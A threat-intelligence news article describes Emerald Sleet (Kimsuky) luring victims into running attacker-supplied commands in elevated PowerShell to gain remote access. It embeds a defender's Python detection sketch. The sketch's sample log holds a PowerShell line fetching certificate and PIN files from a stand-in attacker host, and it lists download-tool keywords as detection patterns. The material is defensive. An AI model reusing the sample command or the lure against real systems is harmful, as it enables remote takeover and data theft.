North Korean Kimsuky adopted a new tactic to infiltrate targets

The North Korean state-sponsored cyber group known as Emerald Sleet (also tracked as Kimsuky or Velvet Chollima) has adopted a new tactic to infiltrate its targets: the threat actor tricks individuals into executing PowerShell commands as administrators, which installs malicious software and gives the attacker remote access to the compromised system.

Emerald Sleet has historically focused on a broad range of targets, including government agencies, NGOs, media outlets, and individuals linked to international diplomacy. The group has conducted operations against victims across North America, South America, Europe, and East Asia, with a particular emphasis on individuals involved with Northeast Asian affairs.

According to Microsoft Threat Intelligence, the group's new tactic involves a multifaceted spear-phishing attack designed to establish trust before delivering the malicious payload.

The attack begins with the threat actor impersonating a South Korean government official, cultivating a relationship with the target over time.

Once trust is established, the attacker sends a spear-phishing email with a PDF attachment. To view the PDF's contents, the target is asked to click a URL that leads to a "device registration" page, where the victim is instructed to open PowerShell as an administrator and paste a series of commands supplied by the threat actor.

If the target follows through and executes the code, it installs a browser-based remote desktop tool and downloads a certificate file and a hardcoded PIN from a remote server. With these, Emerald Sleet registers the victim's device on its own server, gaining remote control of the system and the ability to exfiltrate sensitive data.
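A defender's detection sketch for the behaviour described above, added here as an example and not taken from the article or from Microsoft's report. It flags PowerShell that was launched interactively, runs elevated, and pulls a certificate or PIN file from the web; the log format is a constructed key=value form loosely modelled on process-creation telemetry, and every host, path and URL in it is a placeholder.

```python
import re

# Constructed sample events (placeholder hosts, paths and URLs). Line 2 mirrors
# the paste-into-elevated-PowerShell pattern: interactive parent, High
# integrity, web downloads of a certificate and a PIN file.
SAMPLE_LOG = r"""
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe IntegrityLevel=High CommandLine="powershell.exe" User=CORP\jdoe
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\Windows\explorer.exe IntegrityLevel=High CommandLine="powershell -c iwr https://attacker.example/cert.pem -OutFile $env:TEMP\c.pem; iwr https://attacker.example/pin.txt -OutFile $env:TEMP\pin.txt" User=CORP\jdoe
Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentImage=C:\ProgramData\Agent\agent.exe IntegrityLevel=System CommandLine="powershell -File C:\ProgramData\Agent\update.ps1" User="NT AUTHORITY\SYSTEM"
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')          # key=value or key="quoted value"
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget|"
                         r"downloadstring|downloadfile|start-bitstransfer)\b", re.I)
ARTIFACT_RE = re.compile(r"\.(pem|crt|cer|pfx)\b|\bpin\b", re.I)  # cert or PIN material
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

def parse_event(line):
    """Turn one key=value log line into a dict, stripping quotes from values."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def suspicion_reasons(ev):
    """Return the indicators a single process-creation event matches."""
    basename = lambda p: p.rsplit("\\", 1)[-1].lower()
    if basename(ev.get("Image", "")) not in SHELLS:
        return []
    reasons = []
    parent = basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    if parent in INTERACTIVE_PARENTS:
        reasons.append("launched interactively from " + parent)
    if ev.get("IntegrityLevel") == "High":
        reasons.append("running elevated")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("downloads content from the web")
    if ARTIFACT_RE.search(cmd):
        reasons.append("fetches certificate/PIN material")
    return reasons

def scan(log_text, min_reasons=3):
    """Return (user, reasons) for events matching at least min_reasons indicators."""
    hits = []
    for line in log_text.strip().splitlines():
        reasons = suspicion_reasons(parse_event(line))
        if len(reasons) >= min_reasons:
            hits.append((parse_event(line).get("User"), reasons))
    return hits

if __name__ == "__main__":
    for user, reasons in scan(SAMPLE_LOG):
        print(user, "->", "; ".join(reasons))
```

An elevated interactive shell alone (line 1) is normal administrator activity and stays below the threshold; it is the combination with web downloads of certificate and PIN material that raises the alert.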

Microsoft said it has observed a limited number of attacks utilizing this new tactic since the start of 2025.

“While we have only observed the use of this tactic in limited attacks since January 2025, this shift is indicative of a new approach to compromising their traditional espionage targets,” the threat intelligence team warned.
